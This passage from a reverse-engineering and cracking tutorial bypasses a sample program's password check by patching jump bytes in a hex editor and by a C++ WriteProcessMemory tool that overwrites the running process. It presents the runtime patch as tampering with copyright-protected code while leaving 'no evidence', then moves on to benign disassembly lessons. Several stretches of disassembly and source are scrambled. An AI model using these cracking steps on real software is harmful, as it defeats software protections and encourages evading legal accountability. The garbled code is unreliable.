Now think: what if we could set the whole security section aside, so that when execution starts the program jumps directly to the main sections without ever executing the security instructions? Note that we cannot simply delete the instructions, as that would alter the memory-addressing offsets and thus lead to a total failure of the execution of the software; otherwise we would need to manually change all offset-related instructions (automated cracking software can manage these problems). Instead, we have to place jump instructions over the security code, or change it to a NOP sled by writing 0x90 instructions in place of its hex bytes. Remember, the total number of bytes in the original software and in the cracked software should be the same for proper working.
dword ptr [ebp-1Ch] in next line the counter is being incremented by 1 in ecx register.data section. .text section shown before or after the password is entered (generally this text may be like “Enter the password:” or the error messages if wrong password is entered).3 in above line the counter is compared with 3 (the maximum chances of entering passwords). Remember security functions are invoked before other regular instructions mostly but but after the startup code.dword ptr ds:[004130B4h] 00401092: 89 4D D8 mov dword ptr [ebp-28h].2Ch 00401084: A1 B0 30 41 00 mov eax.ecx 004010B8: 83 7D E4 03 cmp dword ptr [ebp-1Ch]. 00401089: 89 45 D4 mov dword ptr [ebp-2Ch]. 004010B2: 83 C1 01 add.al 004010A6: C7 45 E4 01 00 00 mov dword ptr [ebp-1Ch]. .1 004010B5: 89 4D E4 mov dword ptr [ebp-1Ch].[004130B0] the above address lies in .esp 00401081: 83 EC 2C sub esp.dword ptr ds:[004130B8h] 0040109B: 89 55 DC mov dword ptr [ebp-24h]. jump to exit section. A simple technique is to search for the address of text in . From 09 to 0x45 (45 = 69 bytes down the address of string “START” pushed to the stack.[ebp-2Ch] .edx 0040109E: A0 BC 30 41 00 mov al. 004010BC: 7F 6A jg 00401128 if counter is greater than 3 then.8 004010D0: 6A 15 push 15h 004010D2: 8D 55 E8 lea edx. we have landed in security related section. . 50 . . 004010AF: 8B 4D E4 mov ecx. . _main: 0040107E: 55 push ebp 0040107F: 8B EC mov ebp. . .First of all we must spot the first instruction of the security mechanism.exe.ecx 00401095: 8B 15 B8 30 41 00 mov edx. Open the text file containing the assembly of secpass.414D00h 004010DB: E8 F0 02 00 00 call 004013D0 004010E0: 8D 45 E8 lea eax. . .1 00 004010AD: EB 09 jmp 004010B8 let’s change above jump offset.[004130BC] 004010A3: 88 45 E0 mov byte ptr [ebp-20h].[ebp-18h] 004010E3: 50 push eax 004010E4: 8D 4D D4 lea ecx.eax 0040108C: 8B 0D B4 30 41 00 mov ecx.[ebp-18h] 004010D5: 52 push edx 004010D6: B9 00 4D 41 00 mov ecx.
eax 00401121: E8 4A 00 00 00 call 00401170 00401126: EB 87 jmp 004010AF below this comment. . We have the offset of jump as 0x09 we need to change it to 0x45.8 004010F0: 85 C0 test eax.eax the passwords are being matched by above instruction. We need to count the total number of hex values from 004010AD: EB 09 to 004010F4: 69 Just subtract the address 0x004010AF (next byte from jump instruction’s offset byte) from 0x004010F4. call for system.eax 0040112A: 8B E5 mov esp. (the position of EB will be counted as 0) it comes out to be 69. the address of string "START". . 004010F9: E8 BD 46 00 00 call 004057BB . jump to section showing “login failed” message. then change this count in hex format using calculator and open secpass. . 004010F2: 75 14 jne 00401108 004010F4: 68 D8 30 41 00 push 4130D8h . 004010FE: 83 C4 04 add esp. actually 0x45 = 69 in decimal form.8 0040111F: 8B C8 mov ecx. 004010E7: 51 push ecx 004010E8: E8 73 47 00 00 call 00405860 004010ED: 83 C4 08 add esp. . . the return value of main is being prepared as it will exit by returning 0 & it is returned through eax register by xoring it with itself.exe in hexeditor and change 0x09 to 0x45 the instruction 004010AD: EB 09 jmp 004010B8 51 ..ebp 0040112C: 5D pop ebp 0040112D: C3 ret We conclude that if jump offset at instruction 004010AD: EB 09 jmp 004010B8 (0x09) will change to the offset of instruction 004010F4: 68 D8 30 41 00 push 4130D8h (0x45 = 69bytes) then we can directly bypass the “Enter Password:” step and will directly land in our new command console. 0040111C: 83 C4 08 add esp. 00401128: 33 C0 xor eax. . if they do not match then.
will automatically change to

004010AD: EB 45              jmp 004010F4

Now "Save As" the changes to a file named secjmp.exe and run it. We did it again. So you have learnt several ways to crack secpass.exe; remember, the security will not be so simple to understand everywhere, and most of the time we have to apply all of these techniques together. You can apply the same techniques to most security systems to check the strength of the protection mechanism. The same objective can also be achieved by using the WriteProcessMemory function and modifying the jump offset on-the-fly. We will learn the use of this function in the forthcoming sections.
Code Patching On-The-Fly

Remember, physically tampering with any copyright-protected code or program can make you trespass the boundaries of the law. But what if we do it on-the-fly, with no evidence left after the termination of the process? When the law gets hacked, so to speak. We can apply all the above code-patching techniques at process level; this technique is the most amazing of all the static methods applied above. The Kernel32.dll has the answer and gives us a spark of light to perform this hack. Do the following command in the windows\system32 directory:

C:\windows\system32>dumpbin /exports kernel32.dll >c:\kernelxpo.txt

Now check the kernelxpo.txt file and you'll find the following:

ordinal  hint  RVA       name
    629   274  0001E079  OpenProcess
    917   394  0000220F  WriteProcessMemory

But WriteProcessMemory requires a handle to the process to be patched. The OpenProcess function needs the process id and returns the process handle. We have to provide this handle to the WriteProcessMemory function, and it can write any number of bytes into the target process space. We are interested in patching the following code in secpass.exe:

004010F0: 85 C0              test eax,eax
004010F2: 75 14              jne 00401108

If we transform the four code bytes 85 C0 75 14 into 90 90 90 90, the check will obviously vanish and will be transformed into a NOP sled (no-operation code bytes). Let us do it in code:
\n"). Now execute the secpass. printf("Failed to open process handle. HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS.. if (WriteProcessMemory(hProcess. pid). "usage:\npatch <processID>\n"). pid).Success...exe PID 1284 Session Name Console Session# 0 Mem Usage 624 K Now we execute patch: patch 384 Target process with pid : 384 Status: .\n")."./* patch. Compile it.. In our case it is 1284 as: Image Name secpass....exe and check its process id by executing tasklist command. if(hProcess != NULL) { printf("Target process with pid : %d\nStatus: . } else } else } return EXIT_SUCCESS. } char buffer[] = "\x90\x90\x90\x90".. { { fprintf(stderr.h> #define ADDRESS 0x004010F0 using namespace std. 54 .\n"). pid = atoi(argv[1]).Success. char **argv) if (argc < 2) exit(1). buffer.. (void *)ADDRESS.txt */ #include <iostream> #include <windows..Failed. int main (int argc. lstrlen(buffer). printf(". false. int pid = 0.... 0)) { printf("..
The running secpass.exe gets patched and from then on executes the NOP sled instead of the test and jne instructions:

C:\Documents and Settings\vinnu\develop>secpass
Enter the password: sdcsad
Login failed.

// now execute patch.exe in another console, then try again:

C:\Documents and Settings\vinnu\develop>secpass.exe
Enter the password: sdcsad

C:\Documents and Settings\vinnu\develop>

The second time, the same wrong password opens up the intended command console. Remember, the security mechanism will not be so simple in most cases; it may be found scattered across several different block units, and it will therefore need to be patched at several places simultaneously.
Understanding Architecture of Software at Low Level

It is time to study and identify some important parts of high-level language code at machine level, or assembly level; we have to analyze it with brain-blasting effort. A hacker should be capable of handling any kind of user interface, may it be the interface of a missile system, a satellite control system, the interface of a nuclear reactor, or a fusion of GUI and CLI. But remember, hacking has nothing to do with user interfaces; instead of user interfaces, we should focus on algorithms. If you have to be a hacker, then you must also know that the command console is stronger than the GUI: what a command console can do, a GUI sometimes cannot. The GUI needs more memory and CPU resources than the command console, the console is also faster than the GUI, and most remote attacks are possible using a command console. So let's choose the hard path.

The software structure at machine level depends upon the compiler used to compile the high-level code: the same code compiled in Visual C++ 6.0 will be different from that compiled in Borland or Watcom or any other compiler. We are going to discuss the output of Visual C++ 6.0 (Microsoft Visual Studio), and we will compile every program using the CL compiler, which can be used at the command console and provides more control over the compilation process.

Note: the final compilation before release does not include the debugging information. But if we alter the compiler's settings to produce debugging information, the picture becomes much clearer.

The main or winmain function is not the first function called at the start of execution; the startup code is started first. When the startup code finishes its work, it transfers control to main or winmain, and every developer-defined function is called from within main or winmain. When the software finishes its job, execution returns to the end of main or winmain, and then main transfers the execution control, along with its return value (mostly in the EAX register), to the function which called main (_mainCRTStartup()), which then calls exit(). Therefore, in order to identify main or winmain, we must identify the last function which transfers control to main and, after completion, takes back the execution control. There is no need to study the whole startup-code chain further.
First of all, we must know what a function is in assembly, or machine instructions (in hex format); we are not going to define what a function or subroutine is called at a higher level. In assembly, functions are mostly called by an instruction 'CALL address', where the address is the place where the function code lies. Every function has an important aspect: an identical prologue and epilogue, depending upon the convention in which the function is defined.

Prologue: the starting of the function code. The prologue contains the alignment of the stack. Mostly, the instructions given below constitute the prologue:

55       push ebp
8B EC    mov ebp,esp

If the instruction push ebp receives a call from somewhere, then these instructions are enough for the identification of a function's prologue.

Epilogue: the ending of a function. It transfers the execution control back to the instruction next to its caller instruction. The instructions

5D       pop ebp
C3       ret

constitute the epilogue. The ret instruction may also be a 'ret n' instruction, where n is a natural number, depending upon the calling convention; this epilogue is inherited from the PASCAL calling convention. But it does not always mean that the function is declared with the Pascal calling convention; a stdcall calling convention may be followed instead, since stdcall is actually the resultant of both calling conventions.

Remember that Visual Studio supports NAKED function calls, which lead to functions without any prologue; developers can insert their own prologue, if needed:

void __declspec(naked) nakFunct(void)
{
}

The function calling conventions are generally either cdecl or pascal. The calling conventions can be identified by the argument-pushing methods and the stack-clearing methods followed by the functions: in cdecl, stack clearing is done by the caller function, not the called function. Another calling convention, fastcall, also exists; as the name specifies, this calling convention optimizes the called function's code.

Now we can identify the functions in a program with the help of the prologue and epilogue. Let's do it. Disassemble secpass.exe as

Dumpbin /disasm secpass.exe >c:\code\secpass.txt

In secpass.txt:

0040105D: 55                 push ebp          ; prologue starts
0040105E: 8B EC              mov ebp,esp       ; part of prologue
00401060: 68 6F 10 40 00     push 40106Fh      ; argument pushed on the stack
                                               ; for the next function
00401065: E8 0E 46 00 00     call 00405678     ; a function call from within
                                               ; the function
0040106A: 83 C4 04           add esp,4
0040106D: 5D                 pop ebp           ; epilogue
0040106E: C3                 ret               ; epilogue; end of a function
0040106F: 55                 push ebp          ; prologue starts
00401070: 8B EC              mov ebp,esp       ; part of prologue
00401072: B9 D0 4B 41 00     mov ecx,414BD0h
00401077: E8 07 2B 00 00     call 00403B83
0040107C: 5D                 pop ebp           ; epilogue
0040107D: C3                 ret               ; epilogue; end of a function
0040107E: 55                 push ebp          ; prologue of main()
0040107F: 8B EC              mov ebp,esp
00401081: 83 EC 2C           sub esp,2Ch
00401084: A1 B0 30 41 00     mov eax,[004130B0]
00401089: 89 45 D4           mov dword ptr [ebp-2Ch],eax
0040108C: 8B 0D B4 30 41 00  mov ecx,dword ptr ds:[004130B4h]
00401092: 89 4D D8           mov dword ptr [ebp-28h],ecx
00401095: 8B 15 B8 30 41 00  mov edx,dword ptr ds:[004130B8h]
0040109B: 89 55 DC           mov dword ptr [ebp-24h],edx
0040109E: A0 BC 30 41 00     mov al,[004130BC]
004010A3: 88 45 E0           mov byte ptr [ebp-20h],al
004010A6: C7 45 E4 01 00 00  mov dword ptr [ebp-1Ch],1
          00
004010AD: EB 09              jmp 004010B8
004010AF: 8B 4D E4           mov ecx,dword ptr [ebp-1Ch]
004010B2: 83 C1 01           add ecx,1
004010B5: 89 4D E4           mov dword ptr [ebp-1Ch],ecx
004010B8: 83 7D E4 03        cmp dword ptr [ebp-1Ch],3
004010BC: 7F 6A              jg 00401128
004010BE: 68 C0 30 41 00     push 4130C0h
004010C3: 68 70 4C 41 00     push 414C70h
. stack is cleared by 0 004056E6 401150h . . checkout this 414C70h . ebp. .eax .4 ebp .8 . epilogue. start of a function.8 eax.esp 402890h 00405678 esp. of a function.text section. .414D00h 004013D0 eax.8 15h edx. 00401101: 6A 00 push 00401103: E8 DE 45 00 00 call 00401108: 68 50 11 40 00 push . esp.[ebp-18h] edx ecx.4 . 004010C8: E8 D3 13 00 00 call 004010CD: 83 C4 08 add 004010D0: 6A 15 push 004010D2: 8D 55 E8 lea 004010D5: 52 push 004010D6: B9 00 4D 41 00 mov 004010DB: E8 F0 02 00 00 call 004010E0: 8D 45 E8 lea 004010E3: 50 push 004010E4: 8D 4D D4 lea 004010E7: 51 push 004010E8: E8 73 47 00 00 call 004010ED: 83 C4 08 add 004010F0: 85 C0 test may be if condition. end 004024A0 esp. . end 0040113D: 55 push 0040113E: 8B EC mov 00401140: 68 90 28 40 00 push 00401145: E8 2E 45 00 00 call 0040114A: 83 C4 04 add 0040114D: 5D pop 0040114E: C3 ret . only two words are argument was a new line ecx. epilogue. 00401108 . something from 4130E0h . 004010F2: 75 14 jne always has conditional jumps. 0040111C: 83 C4 08 add cleared from stack. 00401112: 68 70 4C 41 00 push 00401117: E8 84 13 00 00 call routine. . 004024A0 . It means the third character. 004010F4: 68 D8 30 41 00 push stack for next function 004010F9: E8 BD 46 00 00 call 004010FE: 83 C4 04 add calling function.ebp ebp . .[ebp-18h] eax ecx. 0040110D: 68 E0 30 41 00 push address may be in data section.the third argument.. . ebp .[ebp-2Ch] ecx 00405860 esp. epilogue 59 .eax 00401170 004010AF eax. end 0040112E: 55 push 0040112F: 8B EC mov 00401131: E8 2A 17 00 00 call 00401136: E8 02 00 00 00 call 0040113B: 5D pop 0040113C: C3 ret . new line is pushed from . start of a function. of function. arg pushing on 004057BB . the printing esp. ebp . a testing routine. function call. .text section is pushed on the stack. . .esp 00402860 0040113D ebp of a function. 0040111F: 8B C8 mov 00401121: E8 4A 00 00 00 call 00401126: EB 87 jmp 00401128: 33 C0 xor 0040112A: 8B E5 mov 0040112C: 5D pop 0040112D: C3 ret . testing code 4130D8h . 
ebp.eax esp. May be printf or cout.
Other techniques also exist to disguise a function call, in which the simple call instruction is replaced by a jmp instruction. Before discussing this technique, let us discuss some aspects of the call and jump instructions.

Call instruction: the call instruction is responsible for calling a subroutine or a function. Call is accompanied by an address offset: the distance between the address of the call instruction and the first instruction of the function's prologue. Before the processor jumps to the function code, the address of the instruction next to the call instruction is saved on the stack as the return address, which will be loaded into EIP when the called function finishes its job. Remember, the ret instruction will make the processor land on whatever address is stored in place of the saved return address; in buffer-overflow attacks this situation is exploited to control the execution of the processor by overwriting the saved return address. We will discuss this attack technique in detail in the next sections. The property of the call instruction of saving the return address on the stack is also quite helpful in shellcode (payload) development.

Jump instructions: there is a set of jump instructions, which is divided into two parts:

1) Conditional jumps
2) Unconditional jumps

Conditional jumps: a conditional jump instruction is followed only if a certain condition is satisfied; otherwise the instruction is crossed over safely to the next instruction. Conditional jumps are totally dependent upon decision-making instructions for their operation. They are essential parts of security systems and control structures, but not every conditional jump means the code is dealing with security; the code may be part of a control structure necessary for the normal execution of the software. The conditional loops like while, do-while and for, and the decision-making structures like if and switch, all use conditional jumps.
Decision making instructions: We are familiar with two instructions. which are used in nearly all cases where decision-making is done. etc. jle. jge are used. It is not necessary that the next to conditional instruction will always be the conditional jump. jb. The jmp instruction always takes the processor to offset accompanied with the jmp instruction and never come back on its own. Artificial Intelligence: The machines are equipped with brain (processor). In most cases in security systems the jumps je. jz. The security system can be fractured by changing these jump conditions. greater than. The jmp instruction don’t need any decision making code before itself and works completely independent. use the conditional jumps. jne. jmp. jl. jnz. jg. while most other conditional jumps are followed by cmp instruction. cmp: The cmp instruction compares to values for their logical relationships like less than. less than equal to or greater than equal to. Je Jne Jl Jle Jg Jge …etc jump if equal jump if not equal jump if less jump if less or equal jump if greater jump if greater or equal The je and jne are normally placed after a test instruction. Unconditional jump: the unconditional jump set comprise only a single element i. The set of conditional jumps include mostly je. The cmp instruction is also followed by conditional jumps. jl. senses (sensors) but still differ from living things in lots of aspects and one is the 61 . instead there may be some other instructions and then a conditional jump. ja.decision-making structures like if & switch etc.e. These are 1) test 2) cmp test: The test condition checks whether the two values are equal or not. jne. The test instruction is followed by je or jne conditional jumps. jae. jge. jbe. jg.
intelligence. So machines are now also equipped with artificial intelligence. Actually, their intelligence depends upon statistical databases. This results in better decision-making by machines and, therefore, better production. Why should compilers lag behind in the race of artificial intelligence? Nowadays nearly every modern compiler is equipped with it: compilers work independently at machine level and eliminate any code which never gets control, or whose result is used nowhere; the compiler can decide what to do with the code while compiling. One little example we have crafted is waiting next. Consider the following code:

/* emptyif.cpp */
#include <iostream>
using namespace std;

int main ()
{
    int a = 2;
    int b = 3;
    cout << "This cout is before if" << endl;
    if ( a <= b)
    {
    }
    else
    {
    }
    cout << "This cout is after else" << endl;
    system ("PAUSE");
    return EXIT_SUCCESS;
}

We compiled it as

CL /Gs emptyif.cpp

And now disassemble the resultant exe file as

Dumpbin /DISASM emptyif.exe >dump\emptyif.txt

And dump the .data section as

Dumpbin /SECTION:.data /RAWDATA:bytes emptyif.exe >dump\emptyifdat.txt

Now check the disassembled code:

_main:
0040107E: 55                 push ebp            ; prologue of main().
0040107F: 8B EC              mov  ebp,esp        ; prologue of main().
00401081: 83 EC 08           sub  esp,8          ; two dwords are reserved on the stack.
00401084: C7 45 FC 02 00 00  mov  dword ptr [ebp-4],2
          00                                     ; 2 is saved on the stack.
0040108B: C7 45 F8 03 00 00  mov  dword ptr [ebp-8],3
          00                                     ; 3 is saved on the stack.
00401092: 68 10 11 40 00     push 401110h
00401097: 68 A0 D0 40 00     push 40D0A0h        ; the pointer to string "This cout is before if"
                                                 ; is pushed on the stack.
0040109C: 68 A8 DD 40 00     push 40DDA8h
004010A1: E8 CA 05 00 00     call 00401670       ; call for cout, two arguments; probably one is a
                                                 ; string pointer and the other is endl (newline).
004010A6: 83 C4 08           add  esp,8          ; the two arguments of cout are deleted.
004010A9: 8B C8              mov  ecx,eax        ; the value of cout is moved from eax to ecx as an
                                                 ; argument for the endl handling code.
004010AB: E8 80 00 00 00     call 00401130       ; call for endl.
004010B0: 68 10 11 40 00     push 401110h
004010B5: 68 B8 D0 40 00     push 40D0B8h        ; the pointer to string "This cout is after else."
                                                 ; is pushed on the stack.
004010BA: 68 A8 DD 40 00     push 40DDA8h
004010BF: E8 AC 05 00 00     call 00401670       ; call for cout, two arguments.
004010C4: 83 C4 08           add  esp,8          ; stack clearing.
004010C7: 8B C8              mov  ecx,eax
004010C9: E8 62 00 00 00     call 00401130       ; call for endl.
004010CE: 68 D0 D0 40 00     push 40D0D0h        ; string "PAUSE" is pushed on the stack, a single
                                                 ; argument.
004010D3: E8 2F 33 00 00     call 00404407       ; call for system.
004010D8: 83 C4 04           add  esp,4          ; stack clearing of system.
004010DB: 33 C0              xor  eax,eax        ; the return value for main is prepared by zeroing
                                                 ; the eax register.
004010DD: 8B E5              mov  esp,ebp        ; the epilogue of main starts.
004010DF: 5D                 pop  ebp            ; epilogue.
004010E0: C3                 ret

Note that there is no code between the two borderline couts which enclosed the entire if-else clause, and we found no comparison instructions in the executable file. As the if-else structure was empty, the compiler did not place its machine code in the exe file. This is the result of the artificial intelligence of the compiler: it is strong proof that the compiler can eliminate useless code, useless because its result is used nowhere. Therefore, do not be surprised if the compiler at low level
eliminates your code. Let us analyze the naked function at low level:

/* nakFunc.cpp */
#include <iostream>
using namespace std;

void nakFunct();

int main (int argc, char* argv[])
{
    nakFunct();
    return EXIT_SUCCESS;
}

void __declspec (naked) nakFunct()
{
    cout << "This is the naked function example." << endl;
}

Compile the above program as

CL /Gs nakFunc.cpp

Now produce its disassembly as follows:

Dumpbin /disasm nakFunc.exe >nakFunc.txt

The assembly excerpt of nakFunc.txt:

_main:
0040107E: 55              push ebp
0040107F: 8B EC           mov  ebp,esp
00401081: E8 04 00 00 00  call 0040108A
00401086: 33 C0           xor  eax,eax
00401088: 5D              pop  ebp
00401089: C3              ret
nakFunc:
; Well, look here: no prologue is prepared for this function. But we can
; identify it as a function because the code of this block gets its call
; through a call instruction. However, we could eliminate the call
; instruction with a jmp instruction.
0040108A: 68 D0 10 40 00  push 4010D0h
0040108F: 68 A0 C0 40 00  push 40C0A0h
00401094: 68 78 CD 40 00  push 40CD78h
00401099: E8 92 05 00 00  call 00401630
0040109E: 83 C4 08        add  esp,8
004010A1: 8B C8           mov  ecx,eax
004010A3: E8 48 00 00 00  call 004010F0
004010A8: 55              push ebp
004010A9: 8B EC           mov  ebp,esp
004010AB: E8 90 08 00 00  call 00401940
004010B0: E8 02 00 00 00  call 004010B7
004010B5: 5D              pop  ebp
004010B6: C3              ret
Identification of main

Before analyzing the code, we must know where the main function gets its call, i.e. where the developer's code gets control from the startup code. The function in the startup code that calls main is _mainCRTStartup. This function calls main and, after the completion of main, it calls exit, passing the value returned by main to exit. The _mainCRTStartup has a unique signature that can be easily identified (we mean its structure), and it can be identified in assembly code in the same way antivirus software detects the presence of a virus.

Note: the structure of the library functions depends upon the version and the compiler used. The way of data handling may be different, but the resulting output will be the same. This happens because of the different conventions used by the compiler developers; programs compiled with different compilers and different library versions will always differ, and even the programmer's compiled code will be different under different compilers. But remember that the algorithm used will never change; therefore, try to identify the algorithms. We can also cram the structures of a few important library functions.

The developer's defined functions get their calls from within the main or winmain function. In most cases the compiler does its work before the linker, so the first function defined in the program's high-level code gets compiled first, the second at second place, and so on, with the linker appending the other library functions later. But it is not necessary; it can change depending upon the developer's intentions and the project settings. Also, every main in different programs is unique and thus has no fixed signature of its own. But we must find it out, so we have to focus first on the identification of main.
The structure of every main function is completely dependent upon the programmer's code. The library functions and the startup code, on the other hand, are static in nature, meaning always the same code, unlike main. The startup code is appended by the linker at the end of the compiled programmer's code in the executable file. Therefore we can conclude that the compiled code of main and of all the functions defined by the programmer should be concentrated near the top of the executable file.
We are not going very deeply here; our observations are based on general distinctions. The structure of _mainCRTStartup makes it unique: it has two consecutive call instructions, then one mov instruction, then a call instruction, then again one mov instruction, and at last three consecutive call instructions. Check out the code excerpt given below; this is the signature produced by Microsoft Visual Studio 6:

00404C6A: E8 6C 1F 00 00     call 00406BDB
00404C6F: FF 15 14 C0 40 00  call dword ptr ds:[0040C014h]
00404C75: A3 24 F7 40 00     mov  [0040F724],eax
00404C7A: E8 63 2F 00 00     call 00407BE2
00404C7F: A3 24 F2 40 00     mov  [0040F224],eax
00404C84: E8 0C 2D 00 00     call 00407995
00404C89: E8 4E 2C 00 00     call 004078DC
00404C8E: E8 1D F9 FF FF     call 004045B0

We can use some tricks to find the _mainCRTStartup function. Open the executable in Visual C++ and click on the Build menu, then Start Debug, then Step Into (or press F11). The first instruction shown with the arrow pointer, where we land, will be the prologue of the _mainCRTStartup function. This method is the easiest. Another method involves checking every function near the top of the executable, finding its caller function and analyzing the caller's signature; that method is very cumbersome and is helpful only in small programs, where the programmer defines few functions or where only inline functions are used.

Now let's check where _mainCRTStartup transfers control to main. Functions mostly get control by a call instruction, and before the call instruction the arguments are prepared for the called function; main has a unique set of its three arguments. Let's check the _mainCRTStartup of emptyif.exe:

0040495E: 6A 1C              push 1Ch
00404960: E8 9A 00 00 00     call 004049FF
00404965: 59                 pop  ecx
00404966: 83 65 FC 00        and  dword ptr [ebp-4],0
; ------------------- the signature of mainCRTStartup -------------------
0040496A: E8 05 27 00 00     call 00407074
0040496F: FF 15 08 B0 40 00  call dword ptr ds:[0040B008h]
00404975: A3 E4 F6 40 00     mov  [0040F6E4],eax
0040497A: E8 C3 25 00 00     call 00406F42
0040497F: A3 64 E1 40 00     mov  [0040E164],eax
00404984: E8 6C 23 00 00     call 00406CF5
00404989: E8 AE 22 00 00     call 00406C3C
0040498E: E8 A9 11 00 00     call 00405B3C
; ---------------------- cram the above structure -----------------------
00404993: A1 9C E1 40 00     mov  eax,[0040E19C]
00404998: A3 A0 E1 40 00     mov  [0040E1A0],eax
; ---------------------- the arguments for main -------------------------
0040499D: 50                 push eax
0040499E: FF 35 94 E1 40 00  push dword ptr ds:[0040E194h]
004049A4: FF 35 90 E1 40 00  push dword ptr ds:[0040E190h]
; ---------------------- next the call for main -------------------------
004049AA: E8 CF C6 FF FF     call 0040107E       ; the call for main.
004049AF: 83 C4 0C           add  esp,0Ch
004049B2: 89 45 E4           mov  dword ptr [ebp-1Ch],eax
; -------------- return value of main in eax register -------------------
004049B5: 50                 push eax
; ---------------------- next the call for exit -------------------------
004049B6: E8 AE 11 00 00     call 00405B69
004049BB: 8B 45 EC           mov  eax,dword ptr [ebp-14h]
004049BE: 8B 08              mov  ecx,dword ptr [eax]
004049C0: 8B 09              mov  ecx,dword ptr [ecx]
004049C2: 89 4D E0           mov  dword ptr [ebp-20h],ecx
004049C5: 50                 push eax
004049C6: 51                 push ecx
004049C7: E8 EC 20 00 00     call 00406AB8
004049CC: 59                 pop  ecx
004049CD: 59                 pop  ecx
004049CE: C3                 ret

Just scroll down a little in the disassembly and you will find the familiar structure of three calls, then the call for main and, after the completion of main, the call for exit. Remember, the main function will always be followed by the exit function. Note: we have not used the whole code of _mainCRTStartup.
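The three arguments prepared for main above are argc, argv and a pointer to the environment block. Both argv and the environment block are NULL-terminated arrays of char*, which is why a small sketch like the following can recover argc from argv alone (the helper name is ours, and the three-parameter form of main is a common compiler extension, not standard C++):

```cpp
#include <cassert>

// argv and the environment block are NULL-terminated arrays of char*,
// exactly the layout the startup code pushes before calling main
// (argc, argv, envp: three arguments, pushed right to left).
// A main written as `int main(int argc, char* argv[], char* envp[])`
// receives all three on compilers that support the extension.
static int count_entries(char* vec[])
{
    int n = 0;
    while (vec && vec[n] != nullptr)
        ++n;              // walk until the terminating NULL entry
    return n;             // equals argc when vec is argv
}
```

The sketch is only meant to show the layout; the startup code itself fills these arrays before the call to main.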
Variable Definitions

Let us develop the following program:

/* variable.cpp */
#include <iostream>
using namespace std;

int main ()
{
    cout << "The variable definitions starts." << endl;
    int i;
    char c;
    float f;
    cout << "The variable definitions ends." << endl;
    i = 123;
    c = 0x41;
    f = 3.14;
    cout << "int i = " << i << endl;
    cout << "char c = " << c << endl;
    cout << "float f = " << f << endl;
    return EXIT_SUCCESS;
}

And the disassembled code of main:

_main:
0040107E: 55              push ebp
0040107F: 8B EC           mov  ebp,esp
00401081: 83 EC 0C        sub  esp,0Ch
00401084: 68 B0 11 40 00  push 4011B0h
00401089: 68 B0 40 41 00  push 4140B0h
0040108E: 68 D8 5C 41 00  push 415CD8h
00401093: E8 A8 0B 00 00  call 00401C40       ; function call, the 1st cout.
00401098: 83 C4 08        add  esp,8
0040109B: 8B C8           mov  ecx,eax
0040109D: E8 2E 01 00 00  call 004011D0       ; this call may be associated to the endl used in cout.
004010A2: 68 B0 11 40 00  push 4011B0h
004010A7: 68 D4 40 41 00  push 4140D4h
004010AC: 68 D8 5C 41 00  push 415CD8h
004010B1: E8 8A 0B 00 00  call 00401C40       ; function call, the 2nd cout.
004010B6: 83 C4 08 add esp,8 004010B9: 8B C8 mov ecx,eax 004010BB: E8 10 01 00 00 call 004011D0 ; this call may be associated to endl used in cout. 004010C0: C7 45 F4 7B 00 00 mov dword ptr [ebp-0Ch],7Bh the 7B is hex of 123 in decimal. Is placed in stack memory. 00 004010C7: C6 45 FC 41 mov byte ptr [ebp-4],41h the char type is also placed in the stack memory. 004010CB: C7 45 F8 C3 F5 48 mov dword ptr [ebp-8],4048F5C3h 40 ; this larger value is probably the float type. 004010D2: 68 B0 11 40 00 push 4011B0h ; the cout statements block, displaying the variables starts here. 004010D7: 8B 45 F4 mov eax,dword ptr [ebp-0Ch] the int type variable is placed in eax. 004010DA: 50 push eax ; the eax is pushed in stack as an argument to cout function. 004010DB: 68 F4 40 41 00 push 4140F4h ; the string “int i = “, its reference is pushed as an argument. 004010E0: 68 D8 5C 41 00 push 415CD8h 004010E5: E8 56 0B 00 00 call 00401C40 ; call for cout. 004010EA: 83 C4 08 add esp,8 ; stack of cout is cleared. 
004010ED: 8B C8 mov ecx,eax 004010EF: E8 FC 00 00 00 call 004011F0 004010F4: 8B C8 mov ecx,eax 004010F6: E8 D5 00 00 00 call 004011D0 004010FB: 68 B0 11 40 00 push 4011B0h 00401100: 8A 4D FC mov cl,byte ptr [ebp-4] 00401103: 51 push ecx 00401104: 68 00 41 41 00 push 414100h 00401109: 68 D8 5C 41 00 push 415CD8h 0040110E: E8 2D 0B 00 00 call 00401C40 00401113: 83 C4 08 add esp,8 00401116: 50 push eax 00401117: E8 F4 0D 00 00 call 00401F10 0040111C: 83 C4 08 add esp,8 0040111F: 8B C8 mov ecx,eax 00401121: E8 AA 00 00 00 call 004011D0 00401126: 68 B0 11 40 00 push 4011B0h 0040112B: 8B 55 F8 mov edx,dword ptr [ebp-8] 0040112E: 52 push edx 0040112F: 68 0C 41 41 00 push 41410Ch 00401134: 68 D8 5C 41 00 push 415CD8h 00401139: E8 02 0B 00 00 call 00401C40 0040113E: 83 C4 08 add esp,8 00401141: 8B C8 mov ecx,eax 00401143: E8 B8 03 00 00 call 00401500 00401148: 8B C8 mov ecx,eax 0040114A: E8 81 00 00 00 call 004011D0 0040114F: 33 C0 xor eax,eax 00401151: 8B E5 mov esp,ebp 00401153: 5D pop ebp 00401154: C3 ret
And the part of the .data section raw dump that is important to us contains the string constants referenced by the push instructions above.
The first thing to remember is that the variable names defined by the programmer are omitted from the machine code. The variables are tracked by their offsets in the stack or are handed over to registers. The structure of the program code generated by the compiler also differs from that of the original C++ code: the two borderline cout statements are digested together in the disassembled code, while in the source code we separated them by the variable declarations.
The Operators Identification

The operators are essential parts of algorithms. Even minute algorithms use some kind of addition, subtraction, multiplication, division, etc. All these operations are carried out using their respective operators in the higher-level languages. Let us encode an example in C++ employing the multiplication of two variables.
/* multiply.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    int a = 5, b = 10, c = 0;
    c = a*b;
    cout << "The product a*b = " << c << endl;
    return EXIT_SUCCESS;
}
Now save and build the multiply.cpp and compile it from console as:
CL /Gs multiply.cpp
The following command can produce the disassembly of the exe file:
Dumpbin /disasm multiply.exe >multiplyx.txt
The disassembled code will go in multiplyx.txt file. Let us analyze the following code snippet:
_main:
0040107E: 55                 push ebp
0040107F: 8B EC              mov  ebp,esp
00401081: 83 EC 0C           sub  esp,0Ch
00401084: C7 45 FC 05 00 00  mov  dword ptr [ebp-4],5
          00
0040108B: C7 45 F8 0A 00 00  mov  dword ptr [ebp-8],0Ah
          00
00401092: C7 45 F4 00 00 00  mov  dword ptr [ebp-0Ch],0
          00
00401099: 8B 45 FC           mov  eax,dword ptr [ebp-4]
0040109C: 0F AF 45 F8        imul eax,dword ptr [ebp-8]
